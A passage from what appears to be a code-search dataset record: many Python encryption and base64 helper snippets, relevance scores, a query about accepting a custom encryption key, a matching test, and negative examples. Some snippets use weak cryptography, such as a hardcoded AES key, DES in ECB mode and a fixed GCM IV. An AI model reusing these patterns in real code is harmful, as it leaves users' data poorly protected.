= ord(message[c])\n change = code+key\n new = chr(change)\n string += new\n key += key_increment\n \n encoded = ''.join(string)\n return ('Encoded Message:\\t' + encoded)", "def base64url_rsa_encrypt(self, value, public_key):\n rsakey = RSA.importKey(public_key)\n cipher = PKCS1_OAEP.new(rsakey)\n\n # encrypt, IMPORTANT: read about padding modes (RSA.pkcs1_padding)\n encrypted_msg = cipher.encrypt(value)\n\n if encrypted_msg:\n b64 = encrypted_msg.encode('base64')\n b64 = re.sub('(/)', '_', b64)\n b64 = re.sub('(\\+)', '-', b64)\n b64 = re.sub('(=)', '.', b64)\n return b64\n else:\n return AlignetError('RSA Ciphering could not be executed')", "def _encode_encrypted_part(self, value):\n\n return encoding_utils.bytes_to_base64(value)", "def encrypt(self, data):\n\n key_public = RsaPublicKey.Read(self.crypt_public)\n return b64encode(key_public.Encrypt(data))", "def encrypt(cleartext):\n base_encode = {'16': base64.b16encode,\n '32': base64.b32encode, '64': base64.b64encode}\n ciphertext = cleartext+''\n\n for i in range(encrypt_times):\n base = random.choice(['16', '32', '64'])\n ciphertext = base_encode[base](ciphertext)\n\n return ciphertext", "def _encode_base64(data: str) -> str:\n ebytes = base64.b64encode(data.encode(\"utf-8\"))\n estring = str(ebytes, \"utf-8\")\n return estring", "def b64enc(data: bytes) -> str:\n\n return base64.standard_b64encode(data).decode(\"utf-8\")", "def base64url_encode(msg):\n encoded_input = base64.urlsafe_b64encode(to_bytes(msg))\n stripped_input = to_bytes(to_string(encoded_input).replace('=', ''))\n return stripped_input", "def encrypt():\n request_data = request.get_json()\n\n if 'message' in request_data:\n encryption = Encryption()\n try:\n data = encryption.encrypt(request_data['message'])\n except ValueError as error:\n return Response(\n json.dumps(\n {\n 'error': f'Failed to encrypt the message due to the error: [{error}]'\n }\n ),\n 400,\n mimetype='application/json'\n )\n\n for key in data:\n data[key] = b64encode(data[key]).decode()\n\n return jsonify(data), 200\n\n return Response(\n json.dumps({'error': 'Message missing in the request body'}),\n 400,\n mimetype='application/json'\n )", "def encrypt_message(self, message):\n\t\tf = Fernet(self.key)\n\t\treturn f.encrypt(message.encode())", "def encrypt_message(message,public_key,symetric_key):\n\tif message != None:\n\t\tnonce = os.urandom(12)\n\t\tmessage = AESCCM(symetric_key).encrypt(nonce,message.encode(\"iso-8859-1\"),None)\n\t\tnonce, *_ = encrypt(public_key,nonce)\n\t\tmessage ={'nonce' : nonce.decode(\"iso-8859-1\"),'message':message.decode(\"iso-8859-1\")}\n\n\treturn message", "def encrypt(self, message):\n\n IV = Random.new().read(self.BLOCK_SIZE)\n aes = AES.new(self.key, AES.MODE_CBC, IV)\n return base64.b64encode(IV + aes.encrypt(self._pad(message)))", "def encrypt(self, message: bytearray) -> bytearray:\n return self.__PRGA(message)", "def doEncode(self):\n raise CipherError(\"override this func and return the encoded msg\")", "def Encrypt(self, data):\n\n if len(data) % 16 != 0:\n data += ' ' * (16 - len(data) % 16)\n es = AES.new(self.creds.aesKey, AES.MODE_CBC, self.creds.aesIV)\n data = es.encrypt(data)\n data = base64.b64encode(data)\n return data", "def my_base64encode(s):\n return base64.b64encode(s).decode(\"utf-8\")", "def strEnc(data, *keys):\n r = len(data) % 4\n data += (4 - r if r else 0) * chr(0)\n encData = \"\"\n for i in range(len(data) // 4):\n tempBt = strToBt(data[i * 4: i * 4 + 4])\n for key in keys:\n for b in getKeyBytes(key):\n tempBt = enc(tempBt, b)\n encData += bt64ToHex(tempBt)\n return encData", "def _b64_encode(data):\n enc = base64.b64encode(data)\n return enc.translate(B64_TO_BCRYPT, '=')", "def encode_data ( data ) :\n firstpass = base64.b64encode( data )\n cipher = get_cipher( firstpass )\n\n index = 0\n datalen = len( firstpass )\n encoded_data = []\n while index < datalen :\n if index % 2 == 0 :\n encoded_data.append( chr( ord( firstpass[ index ] ) + cipher ) )\n else :\n encoded_data.append( chr( ord( firstpass[ index ] ) - cipher ) )\n index += 1\n\n encoded_data[ 0 ] = firstpass[ 0 ]\n encoded_data[ -1 ] = firstpass[ -1 ]\n encoded_data[ -2 ] = firstpass[ -2 ]\n return ''.join( encoded_data )", "def encrypt(self, raw, use_base64=True, pad=True):\n encryptor = self.cipher.encryptor()\n if pad:\n raw = self._pad(raw)\n crypted_text = encryptor.update(raw) + encryptor.finalize()\n return base64.b64encode(crypted_text) if use_base64 else crypted_text", "def encryptstring(text, password):\n\n enc = []\n for i in enumerate(text):\n key_c = password[i[0] % len(password)]\n enc_c = chr((ord(i[1]) + ord(key_c)) % 256)\n enc.append(enc_c)\n return base64.urlsafe_b64encode(\"\".join(enc).encode()).decode()", "def encryptB64(self, key, value):\n return base64.b64encode(self.encrypt(key, value))", "def encode(self, data):\n return self.__cipher.encrypt(data.encode('utf-8'))", "def encrypt(self, message):\n\n message = self._pad(message)\n iv = Random.new().read(AES.block_size)\n cipher = AES.new(self.key, AES.MODE_CBC, iv)\n return base64.b64encode(iv + cipher.encrypt(message)).decode('utf-8')", "def base64Encode(input, addNewlines = False):\n base64Str = base64.b64encode(input)\n if not type(base64Str) is str:\n base64Str = \"\".join(map(chr, base64Str))\n \n if not addNewlines:\n return base64Str\n\n result = \"\"\n i = 0\n while i < len(base64Str):\n result += base64Str[i:i + 64] + \"\\n\"\n i += 64\n return result", "def base64_encode(text):\n if not isinstance(text, (bytes, bytearray)):\n text = bytes(text.encode())\n encode = base64.b64encode(text)\n return encode.decode('ascii')", "def craft(b64_msg, nkey=key):\n byte_msg = base64.b64decode(b64_msg)\n pad = 8-(len(byte_msg)%8)\n byte_msg += b\"\\x00\"*pad\n enc_msg = encrypt_faces(byte_msg)\n hm = craft_hmac(enc_msg)\n payload = enc_msg+hm\n return base64.b64encode(payload).decode()", "def encrypt(self, s):\n public_key = serialization.load_pem_public_key(\n self.key.encode('utf-8'),\n backend=default_backend())\n\n encrypted = public_key.encrypt(\n s.encode('utf-8'),\n padding.OAEP(\n mgf=padding.MGF1(algorithm=hashes.SHA256()),\n algorithm=hashes.SHA256(),\n label=None))\n # enc = bytes(encrypted).decode(\"utf-8\")\n return str(encrypted)", "def encrypt(self, buffer):\n cipher = AES.new(self.psk, AES.MODE_GCM, FIXED_IV)\n ct_bytes = cipher.encrypt(pad(buffer, AES.block_size))\n return base64.b64encode(ct_bytes)", "def base64_string(self) -> global___Expression:", "def base64encode(self, value):\n\n return value.encode(\"base64\")[:-1].replace(\"\\n\", \"\")", "def encrypt_string(self, raw_string):\n return self.fernet_instance.encrypt(raw_string.encode('utf-8'))", "def enc(self, data):\n return data", "def encrypt(self, msg, fingerprint):\n\n if type(msg) != type(b''):\n raise ValueError(\"msg should be a byte object!\")\n\n if type(fingerprint) != type('') or len(fingerprint) != 40:\n raise ValueError(\"invalid fingerprint!\")\n\n return self.gpg.encrypt(msg, fingerprint).data", "def encrypt_data(self, params):\n from django.core.signing import dumps\n return dumps(params, salt=self.salt_namespace)", "def __encrypt(self, plaintext):\n iv = get_random_bytes(16)\n try:\n encryption_envelope = {'ciphertext':'', \n 'keyid':esn_manifest + '_' + str(self.sequence_number), 'sha256':'AA==', \n 'iv':base64.standard_b64encode(iv).decode('utf-8')}\n except Exception:\n print('ESN is invalid.')\n sys.exit(0)\n\n plaintext = Padding.pad(plaintext.encode('utf-8'), 16)\n cipher = AES.new(self.encryption_key, AES.MODE_CBC, iv)\n ciphertext = cipher.encrypt(plaintext)\n encryption_envelope['ciphertext'] = base64.standard_b64encode(ciphertext).decode('utf-8')\n return json.dumps(encryption_envelope)", "def encrypt_byte_list_in_str(bytearray_list, public_encryption_key_obj):\n encrypted_str_list = []\n for bytearray_str in bytearray_list:\n message_text_enc = public_encryption_key_obj.encrypt(str(bytearray_str.decode(\"utf-8\")), 16)[0]\n encrypted_str_list.append(message_text_enc)\n encrypted_message_str = \"\".join(encrypted_str_list)\n return encrypted_message_str", "def encrypt(self, data):\n if not data:\n return ''\n data = self._pad_data(data)\n return self._crypt(data, self.ENCRYPT)", "async def encrypt(self, message: Message, jids: Optional[List[JID]], tab: ChatTabs):\n\n raise NotImplementedError", "def __encrypt(string: str) -> str:\n key = 171\n result = b\"\\0\\0\\0\" + chr(len(string)).encode('latin-1')\n for i in string.encode('latin-1'):\n a = key ^ i\n key = a\n result += chr(a).encode('latin-1')\n return result", "def encode(keyFile: str, string: str=\"\", inputFile: str=\"\", outputFile:str=\"\") -> str:\n print(\"Encoding message ...\")\n print(\"Is public key file ok ?\", checkKeyFile(keyFile,\"public\"))\n\n if (checkKeyFile(keyFile,\"public\")): \n f = open(keyFile)\n keyData = extractParamsFromKey(f.readlines()[1]) # read the second line of the file and extract the param\n if args.verbose : print(\"keydata (publ) :\", keyData)\n \n #open a file if the string is empty\n if(string == \"\"):\n string = str(readFile(inputFile))\n else:\n string = string\n\n # transform the ascii string into a series of numbers\n asciiToInt = \"\"\n for char in string :\n asciiToInt += str(ord(char)).zfill(3)\n if args.verbose : print(\"ascii to int\", asciiToInt)\n\n # calculate the block length\n blocklen = len(str(keyData[0])) -1\n if args.verbose : print(\"block size is\", blocklen)\n \n # split the string into blocks\n # start bu reversing the string so we can start left to right\n tmp = asciiToInt[::-1]\n # cut them\n blocks = wrap(tmp, blocklen)\n # reverse the lsit of cut\n blocks.reverse()\n # inside eecaht cut reserve the characters\n for i in range(len(blocks)):\n blocks[i] = blocks[i][::-1]\n if args.verbose : print(blocks)\n \n # make sur that every block is the corect length, overwise add padding\n for i in range(len(blocks)):\n blocks[i] = blocks[i].zfill(blocklen)\n if args.verbose : print(\"blocks after padding :\", blocks)\n \n # crypt everyblock\n tempCryptString = \"\"\n if args.verbose : print(\"encrypted blocks:\")\n for i in range(len(blocks)): \n blockEncrypted = str(calculateCrypt(blocks[i], keyData[1], keyData[0]))\n if args.verbose : print(blockEncrypted)\n blockEncrypted = blockEncrypted.zfill(blocklen+1)\n if args.verbose : print(blockEncrypted)\n tempCryptString += blockEncrypted\n if args.verbose : print(\"encrypted string :\",tempCryptString)\n \n # write the contentes to a file\n hexstr = intToHexToBase64(tempCryptString)\n if(outputFile == \"\"):\n print(\"Encrypted :\")\n print(hexstr)\n else :\n print(\"writing to file\", outputFile)\n writeToFile(outputFile, hexstr)\n return hexstr\n else: \n print(\"keyfile is incorrect\")\n return", "def encode(encryption=None):\n\n key_to_encrypt = {'a': 'q', 'b': 'v', 'c': 'x', 'd': 'z', 'e': 'y', 'f': 'w', 'g': 'u', 'h': 't', 'i': 's',\n 'j': 'r',\n 'k': 'p', 'l': 'o', 'm': 'n', 'n': 'm', 'o': 'l', 'p': 'k', 'r': 'j', 's': 'i', 't': 'h',\n 'u': 'g', 'w': 'f',\n 'y': 'e', 'z': 'd', 'x': 'c', 'v': 'b', 'q': 'a',\n 'A': 'Q', 'B': 'V', 'C': 'X', 'D': 'Z', 'E': 'Y', 'F': 'W', 'G': 'U', 'H': 'T', 'I': 'S',\n 'J': 'R', 'K': 'P',\n 'L': 'O', 'M': 'N', 'N': 'M', 'O': 'L', 'P': 'K', 'R': 'J', 'S': 'I', 'T': 'H', 'U': 'G',\n 'W': 'F', 'Y': 'E',\n 'Z': 'D', 'X': 'C', 'V': 'B', 'Q': 'S',\n '1': '5', '2': '9', '3': '8', '4': '7', '5': '6', '6': '4', '7': '3', '8': '2', '9': '1',\n '.': ',', ',': '.', ':': ';', ';': ':', '?': '!', '!': '?', '-': '_', '_': '-', '(': ')',\n ')': '(',\n '%': '$', '$': '%', ' ': '&', '&': ' ', '+': '*', '*': '+'}\n entered_image = input(\"Image name with extension: \")\n img = Image.open(entered_image, 'r')\n\n message = input(\"Message that you want to be encoded: \")\n if (len(message) == 0):\n raise ValueError('Empty message!')\n\n e1 = monoalphabetic_encryption.Encryption(key_to_encrypt, message)\n encrypted_message = e1.encrypt()\n\n new_image = img.copy()\n putPixel(new_image, encrypted_message)\n\n new_image_name = input(\"New image name with extension: \")\n new_image.save(new_image_name, str(new_image_name.split(\".\")[1].upper()))", "def _url_base64_encode(msg):\r\n msg_base64 = base64.b64encode(msg)\r\n msg_base64 = msg_base64.replace('+', '-')\r\n msg_base64 = msg_base64.replace('=', '_')\r\n msg_base64 = msg_base64.replace('/', '~')\r\n return msg_base64", "def _encode_message(message):\n aes_key = get_settings()['aes_key'].encode('utf-8')\n hmac_key = get_settings()['hmac_key'].encode('utf-8')\n\n pad = lambda s: s + (AES.block_size - len(s) % AES.block_size) * chr(\n AES.block_size - len(s) % AES.block_size)\n init_vector = Random.new().read(AES.block_size)\n cipher = AES.new(aes_key, AES.MODE_CBC, init_vector)\n padded_message = pad(message)\n aes_message = init_vector + cipher.encrypt(padded_message)\n hmac_digest = hmac.new(bytes(hmac_key), bytes(aes_message), hashlib.sha1)\n\n return aes_message, hmac_digest", "def aes_encrypt(self, buff):\n start = time.time()\n message = buff.encode()\n raw = pad(message)\n cipher = AES.new(\"DESCRYPTDESCRYPT\", AES.MODE_CBC, iv())\n enc = cipher.encrypt(raw)\n end = time.time()\n print \"Encrypt time: {0:.10f}\".format((end - start))\n return base64.b64encode(enc).decode('utf-8')", "def base64(s):\n return b64encode(s,'[]').replace('=','_')", "def encrypt(self, plaintext: bytes,\n padding: AsymmetricPadding) -> bytes:\n pass", "def AES_encrypt(content: Text) -> bytes:\n cipher = AES.new(secret_key, mode, IV)\n body = Padding.pad(content.encode('utf-8'), bs)\n return b64encode(cipher.encrypt(body))", "def encrypt_message(msg):\n with urllib.request.urlopen(format_url(main_url+\"encrypt.php\",msg)) as f:\n encryptedmessage = f.read().decode('utf-8',\"strict\")\n return encryptedmessage", "def encrypt(self, message):\n return str.translate(message, self._encoder)", "def encrypt(self):\n # Generate a randomized initialization vector\n iv = Random.new().read(AES.block_size)\n # Create a new AES object in Cipher Block Chaining mode\n cipher = AES.new(self.key, AES.MODE_CBC, iv)\n # Add a buffer so that the plaintext is a multiple of 16 characters in length\n pt_len = len(self.plaintext)\n buffer_size = AES.block_size - pt_len % AES.block_size\n strmsg = self.plaintext + \" \" * buffer_size\n return cipher.encrypt(str.encode(strmsg)), iv", "def test_kms_encrypt_returns_b64(self):\n encrypted_secret = ef_utils.kms_encrypt(self.mock_kms, self.service, self.env, self.secret)\n b64_return = base64.b64encode(self.bytes_return)\n self.assertEqual(b64_return, encrypted_secret)", "def encodeMessage(self, key, message):\n # Make sure pure ascii, and replace bullshit\n message = message.encode('ascii', 'replace')\n # Any message needs to be a multiple of 8.\n dsize = len(message)\n #message = struct.pack('!q', int(binascii.crc32(message)& 0xffffffff)) + struct.pack('!q', dsize) + message\n # Encode two dsize parity blocks and check them against eachother on the receiving end\n message = struct.pack('!q', dsize) + struct.pack('!q', dsize) + message\n key = self.createKey(key)\n short = (math.ceil(len(message)/8.0) * 8) - len(message)\n space = \"\\x00\" * int(short)\n enc = DES.new(key, DES.MODE_ECB)\n return enc.encrypt(message+space)", "def demonstrate_string_encryption_key_based(plain_text):\n try:\n # GENERATE key\n key = AESGCM.generate_key(bit_length=256)\n\n # GENERATE random nonce (number used once)\n nonce = os.urandom(12)\n\n # ENCRYPTION\n aesgcm = AESGCM(key)\n cipher_text_bytes = aesgcm.encrypt(\n nonce=nonce,\n data=plain_text.encode('utf-8'),\n associated_data=None\n )\n # CONVERSION of raw bytes to BASE64 representation\n cipher_text = base64.urlsafe_b64encode(cipher_text_bytes)\n\n # DECRYPTION\n decrypted_cipher_text_bytes = aesgcm.decrypt(\n nonce=nonce,\n data=base64.urlsafe_b64decode(cipher_text),\n associated_data=None\n )\n decrypted_cipher_text = decrypted_cipher_text_bytes.decode('utf-8')\n\n logger.info(\"Decrypted and original plain text are the same: %s\",\n decrypted_cipher_text == plain_text)\n except InvalidTag:\n logger.exception(\"Symmetric string encryption failed\")", "def _encrypt_aes_key(aes_key: bytes, receiver_public_key: RsaKey) -> bytes:\n cipher_rsa = PKCS1_OAEP.new(receiver_public_key)\n return cipher_rsa.encrypt(aes_key)", "def fernet_encript(key,message):\n\tf = Fernet(key)\n\treturn f.encrypt(message)", "def encode(text: str) -> str:\n b: bytes = text.encode()\n encoded: bytes = base64.b64encode(b)\n return encoded.decode()", "def encrypt_message(self):\r\n\t\t#Will not let user input useless messages that cannot be encrypted.\r\n\t\twhile True:\r\n\t\t\tself.message = input(\"Please enter a message you would like to encrypt. --> \")\r\n\t\t\tif self.message != \"\" and len(self.message) > 4:\r\n\t\t\t\tbreak\r\n\t\tself.setup_key_encrypt()\r\n\t\tmy_code = Encryptor(self.message, self.key)\r\n\t\tprint(my_code.transfer_encrypt()+ \"|\")", "def encrypt(event=None): # event is passed by binders.\n msg = inputText.get(\"1.0\",tkinter.END)\n outText.delete('1.0', tkinter.END)\n\n f = open(myTmpDir + 'pt' + str(identity) + '.bin','wb')\n f.write(msg)\n f.close()\n\n os.popen(\"rsa.exe e \" + myTmpDir + \"pt\" + str(identity) + \".bin \"+ myTmpDir + \"locEnc\" + str(identity) + \".bin\")\n\n locEncFileName = myTmpDir + \"locEnc\" + str(identity) + \".bin\"\n with open(locEncFileName, \"rb\") as f:\n readFile = f.read()\n # Convert to hex representation\n digest = base64.encodestring(bytes(readFile))\n\n # TODO: overwirite\n outText.insert(tkinter.END, digest)", "def encode_data(data):\n bytes = json.dumps(data).encode('utf-8').encode('base64').replace('\\n', '')\n assert len(bytes) < 250 * 1024\n return bytes", "def encode_base64(self, i):\n return base64.b64encode(struct.pack('!L', self.transcode(i)), self.extra_chars)[:6]", "def encrypt(self, str_msg):\n msg = str_msg.encode('utf-8')\n if self.security_type == gss.RequirementFlag.integrity:\n return gss.wrap(self.ctx, msg, False, None)[0]\n elif self.security_type == gss.RequirementFlag.confidentiality:\n res, used = gss.wrap(self.ctx, msg, True, None)\n if not used:\n raise GSSClientError('User requested encryption, '\n 'but it was not used!')\n return res\n else:\n return msg", "def encode(self):\n return base64.b64encode(self.content).decode('ascii')", "def text(message):\n room = session.get('room')\n key = os.urandom(32)\n iv = os.urandom(16)\n print(key,iv)\n\n print(key[:2],key[:4])\n print(len(key),len(iv))\n print(type(key))\n data = 'hello world 1234' # <- 16 bytes\n\n enc = aes_encrypt(key,data,iv)\n dec = aes_decrypt(key,enc,iv)\n\n print('data:',data)\n print('cipher:', enc)\n print('plain:',dec)\n test = os.urandom(2)\n print('key:', int.from_bytes(test, byteorder='little'))\n print('key', test)\n \n emit('enc_msg', {'key': key.hex(),\n 'cipher': enc.hex(),\n 'iv' : iv.hex(),\n }, room=room)\n emit('message', {'msg': session.get('name') + ':' + message['msg']}, room=room)", "def encrypt(*args, **kwargs) -> str:\n key = pad(settings.PTRACK_SECRET).encode('utf8')\n box = nacl.secret.SecretBox(key)\n nonce = nacl.utils.random(nacl.secret.SecretBox.NONCE_SIZE)\n\n data = json.dumps((args, kwargs))\n # box expects bytes, so we convert here\n bytes_data = data.encode('utf8')\n encrypted = box.encrypt(bytes_data, nonce)\n encoded_data = base64.urlsafe_b64encode(encrypted)\n return encoded_data.decode('utf8')", "def true_send(conn, data):\n encrypted_data = key.encrypt(pickle.dumps(data))\n length = str(len(encrypted_data)).zfill(LENGTH).encode()\n data = length + encrypted_data\n conn.send(data)", "def test_encrypt_key(self):\n encrypted = encrypt('message', key=b'0' * 32)\n\n assert encrypted\n assert encrypted != 'message'", "def encrypt(self, message):\n message = self._padding(message, self._block_size)\n initialization_vector = Random.new().read(self._block_size)\n cipher = AES.new(self._key, AES.MODE_CBC, initialization_vector)\n return base64.b64encode(initialization_vector +\n cipher.encrypt(message))", "def base64_encoder(cls, text, encoding: str = 'utf-8', base64_encoding_map='default') -> str:\n\t\tBASE64MAP = cls.BASE64MAP_dict.get(base64_encoding_map)\n\t\tif not BASE64MAP:\n\t\t\traise ValueError('Invalid base64_encoding_map: only [\"default\", \"RFC3501\", \"RFC4648\"] are allowed')\n\t\ttext_encoded = text.encode(encoding) if type(text) is str else text\n\t\tstr_encoded = ''\n\t\ttext_in_block_of_three = (\n\t\t\t''.join([bin(character).lstrip('0b').zfill(8) for character in text_encoded[i: i + 3]])\n\t\t\tfor i in range(0, len(text_encoded), 3))\n\t\ttext_in_base64_block = (['00' + block[index:index + 6] for index in range(0, 24, 6)] for block in\n\t\t\t\t\t\t\t\ttext_in_block_of_three)\n\t\tfor b64block in text_in_base64_block:\n\t\t\tfor character in b64block:\n\t\t\t\tc_length = len(character)\n\n\t\t\t\tif c_length == 6:\n\t\t\t\t\tcharacter += '00'\n\t\t\t\telif c_length == 4:\n\t\t\t\t\tcharacter += '0000'\n\t\t\t\telif c_length == 2:\n\t\t\t\t\tcharacter += '01' + '0' * 6\n\n\t\t\t\tcharacterToAppend = BASE64MAP[int(character, base=2)]\n\t\t\t\tif characterToAppend == '=' and base64_encoding_map == 'RFC3501':\n\t\t\t\t\tcharacterToAppend = ''\n\t\t\t\tstr_encoded += characterToAppend\n\n\t\treturn str_encoded", "def encrypt_data(self, params):\n raise NotImplementedError", "def encrypt(string,pub):\r\n string = livingDead.utfE(string)\r\n crypto = rsa.encrypt(string, pub)\r\n return crypto", "def _encrypted_user_photo_key_str(self):\r\n face_aes_key_str = settings.VERIFY_STUDENT[\"SOFTWARE_SECURE\"][\"FACE_IMAGE_AES_KEY\"]\r\n face_aes_key = face_aes_key_str.decode(\"hex\")\r\n rsa_key_str = settings.VERIFY_STUDENT[\"SOFTWARE_SECURE\"][\"RSA_PUBLIC_KEY\"]\r\n rsa_encrypted_face_aes_key = rsa_encrypt(face_aes_key, rsa_key_str)\r\n\r\n return rsa_encrypted_face_aes_key.encode(\"base64\")", "def encrypt(data, key):\n data = six.ensure_binary(data)\n data = privy.hide(secret=data, password=key)\n data = six.ensure_text(data)\n return data", "def encode(plain):\n # Remove whitespace and punctionation\n encoded = remove_punctuation(plain.lower())\n encoded = remove_whitespace(encoded)\n \n # Add space after every 5 characters\n encoded = add_space(encoded, 5)\n \n # Use the cipher translation\n encoded = encoded.translate(cipher)\n \n return encoded", "def _EncryptData(self, data):\n if isinstance(data, str):\n data = data.encode('utf-8')\n encrypted_data = self._gpg.encrypt(\n data,\n self.args.target_key,\n sign=self._gpg.list_keys(True)[0]['fingerprint'],\n always_trust=False)\n if not encrypted_data.ok:\n raise Exception('Failed to encrypt data! Log: %s' % encrypted_data.stderr)\n return encrypted_data.data", "def __encryptRSA(msg, key):\n # Convert message to bytes\n msg = msg.encode('utf-8')\n return key.encrypt(\n msg,\n padding.OAEP(\n mgf=padding.MGF1(algorithm=hashes.SHA256()),\n algorithm=hashes.SHA256(),\n label=None\n )\n )", "def b64encode(s: str) -> str:\n return base64.b64encode(s.encode()).decode()", "def get_Base64(self):\n\n return base64_with_linebreaks(self.get_DER())", "def encrypt(self, message):\n return self._transform(message, self._encoder)", "def encrypt(self, message):\n return self._transform(message, self._encoder)", "def b64_json_enc(data):\n json_str = json.dumps(data)\n return base64.b64encode(json_str.encode()).decode()", "def _encode_base64pad(data: str) -> str:\n pattern = r\"[^a-zA-Z0-9\\+]\"\n regex = re.compile(pattern)\n while True:\n ebytes = base64.b64encode(data.encode(\"utf-8\"))\n estring = str(ebytes, \"utf-8\")\n if not regex.findall(estring):\n break\n # Pad with trailing space and try again to eliminate base64 pad chars\n data = data + \" \"\n\n return estring", "def encrypt(self, plaintext: str) -> str:\n\n return self.run(plaintext, Cryptography.ENCRYPT)", "def encrypt(lines:list, data:bytes):\n\n # TODO make ckeck of text length\n lines_index = 0\n if len(lines) < len(data)*8: # raise Error, if text are too short\n raise RuntimeError(\"Error: Text too short to encrypt message\")\n\n for bit in iterate_bits(data):\n if bit:\n lines[lines_index] += \" \"\n lines_index += 1\n return \"\\n\".join(lines)", "def encode(message, cipher):\n return message.translate(str.maketrans(letters, ''.join(cipher)))", "def encrypt(self, message):\n output = []\n for letter in message:\n # preventing white spaces and numbers\n if letter == ' ' or isinstance(letter, int):\n output.append(letter)\n else:\n idx_in_plain = self.PLAIN_TEXT_ALPH.index(letter.upper())\n output.append(self.CIPHER_TEXT_ALPH[idx_in_plain])\n return \"\".join(output)", "def base64_encode_string(string):\n # type: (str or bytes) -> str\n if on_python2():\n return base64.b64encode(string)\n else:\n return str(base64.b64encode(string), 'ascii')", "def encrypt(self, key, plaintext):\n output = []\n padded_key = padd_key(key, plaintext)\n for i in range(len(plaintext)):\n enc_ascii = (ord(plaintext[i]) + ord(padded_key[i])) % 256\n output.append(chr(enc_ascii))\n return ''.join(output)", "def rsa_encrypt(message, publickey):\r\n \r\n # A key object is created to interact with the PyCrypto\r\n # encryption suite. The object contains key data and\r\n # the necessary rsa functions.\r\n temp_key_obj = _rsa_keydict_to_keyobj(publickey)\r\n \r\n return _rsa_chopstring(message, temp_key_obj, temp_key_obj.encrypt)", "def encrypt_message(message: bytes, receiver_public_key: RsaKey, nbits: int = 256) -> bytes:\n aes_key = get_random_bytes(nbits // 8)\n cipher_aes = AES.new(aes_key, AES.MODE_CBC)\n return cipher_aes.iv + _encrypt_aes_key(aes_key, receiver_public_key) + cipher_aes.encrypt(\n pad(message, AES.block_size)) # Padding have to be added in case the size does not fit in exact blocks", "def encrypt(self, request):\n try:\n data = request.get_json()\n if not data:\n return make_response(util.create_response(status=\"error\", message=\"Request Body Empty\"), 400)\n if not data.get(\"input\") :\n return make_response(util.create_response(status=\"error\", message=\"Input String Empty\"), 400)\n\n input = data.get('input')\n output = base64.b64encode(input.encode(\"utf-8\")).decode('utf-8')\n return util.create_response(input=input,output=output)\n except Exception as e:\n return make_response(util.create_response(status=\"error\", message=\"Something Went Wrong.\"), 500)", "def encrypt(self, message, key):\n return self.translateMessage(message, key, \"encrypt\")", "def encrypt_data ( aes_key, data ) :\n salt = Crypto.Random.new( ).read( Crypto.Cipher.AES.block_size )\n cipher = Crypto.Cipher.AES.new( aes_key, Crypto.Cipher.AES.MODE_CFB, salt )\n encrypted_data = cipher.encrypt( data )\n\n return encode_data( salt + encrypted_data )" ]
[ "0.69580686", "0.69413096", "0.6922633", "0.68996924", "0.67965823", "0.6779057", "0.677835", "0.6773155", "0.67529523", "0.67321116", "0.6706291", "0.6699885", "0.66843873", "0.66808355", "0.66681325", "0.6639239", "0.6632102", "0.6602281", "0.6573491", "0.65729386", "0.6543288", "0.65344155", "0.653406", "0.65135497", "0.6511423", "0.64902115", "0.64781266", "0.64745337", "0.6464599", "0.6452452", "0.6422842", "0.6419679", "0.6410992", "0.6401015", "0.63963306", "0.63961613", "0.63933146", "0.6391078", "0.6360968", "0.63047314", "0.63020647", "0.6300612", "0.6297058", "0.62825906", "0.6278497", "0.62735313", "0.626222", "0.62569064", "0.6251571", "0.6244685", "0.6244344", "0.6240783", "0.62384135", "0.6235787", "0.62224203", "0.6208466", "0.6201878", "0.6193141", "0.6128357", "0.6126886", "0.6125921", "0.6122591", "0.6107153", "0.60977167", "0.6086222", "0.6081018", "0.6054823", "0.6046643", "0.60433215", "0.6042291", "0.6036536", "0.60336787", "0.60324806", "0.60265523", "0.60252285", "0.60116273", "0.60030174", "0.5999718", "0.5994576", "0.5991087", "0.599042", "0.59870183", "0.59775174", "0.59761864", "0.5972601", "0.59716165", "0.59716165", "0.5969353", "0.5963334", "0.5961923", "0.596164", "0.59608847", "0.5959927", "0.59586895", "0.59495705", "0.5948784", "0.5941547", "0.5940348", "0.5935805", "0.5933189" ]
0.6409957
33
It accepts a custom encryption key.
def test_encrypt_key(self): encrypted = encrypt('message', key=b'0' * 32) assert encrypted assert encrypted != 'message'
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def encryption_key(self) -> typing.Optional[aws_cdk.aws_kms.IKey]:\n ...", "def set_encryption(key):\n global_scope['enc'] = Encryption(key.encode())", "def encryption_key(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"encryption_key\")", "def encryption_key(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"encryption_key\")", "def _encode_key(self, key: str) -> str:\n return key", "def create_key ():", "def _encrypt_aes_key(aes_key: bytes, receiver_public_key: RsaKey) -> bytes:\n cipher_rsa = PKCS1_OAEP.new(receiver_public_key)\n return cipher_rsa.encrypt(aes_key)", "def prepare_key(self, key):\n return smart_str(key)", "def test_rekey_key_format(self):\n old_key = b'0' * 32\n encrypted = encrypt('message', key=old_key)\n\n with pytest.raises(EncryptionError):\n rekey(encrypted, old_key=old_key, new_key=b'1' * 31)", "def key(self, value=None):\n if self.crypt_method == 'C':\n key_type = \"number\"\n else:\n key_type = \"string\"\n\n input_message = f\"Please enter a {key_type} as a \" \\\n f\"{self.crypt_type}ion key\\n>> \"\n if value is None:\n key = input(input_message)\n else:\n key = value\n\n is_valid_key, key = Check.is_valid_key(key, self.crypt_method)\n if is_valid_key:\n self._key = key\n else:\n raise ValueError(f\"Key{key} is invalid\")", "def test_encrypt_key_invalid(self):\n with pytest.raises(EncryptionError):\n encrypt('message', key=b'0' * 31)", "def _encode_key(self, key):\n return key.encode() if isinstance(key, str) else key", "def load_key(self, key, key_type, key_encoding):\n if key_type is not EncryptionKeyType.SYMMETRIC:\n raise ValueError(\n 'Invalid key type \"{key_type}\" for cipher \"{cipher}\"'.format(key_type=key_type, cipher=self.java_name)\n )\n\n if key_encoding is not KeyEncodingType.RAW:\n raise ValueError(\n 'Invalid key encoding \"{key_encoding}\" for cipher \"{cipher}\"'.format(\n key_encoding=key_encoding, cipher=self.java_name\n )\n )\n\n return key", "def _newKey(self, key):\n pass", "def __init__(__self__, *,\n kms_encryption_config: pulumi.Input['FhirDatastoreKmsEncryptionConfigArgs']):\n pulumi.set(__self__, \"kms_encryption_config\", kms_encryption_config)", "def test_encrypt_key_default(self, settings):\n settings.CHITON_ENCRYPTION_KEY = None\n\n with pytest.raises(EncryptionError):\n encrypt('message')", "def setup_key_encrypt(self):\r\n\t\tself.max_key = math.floor(len(self.message) / 2)\r\n\t\twhile 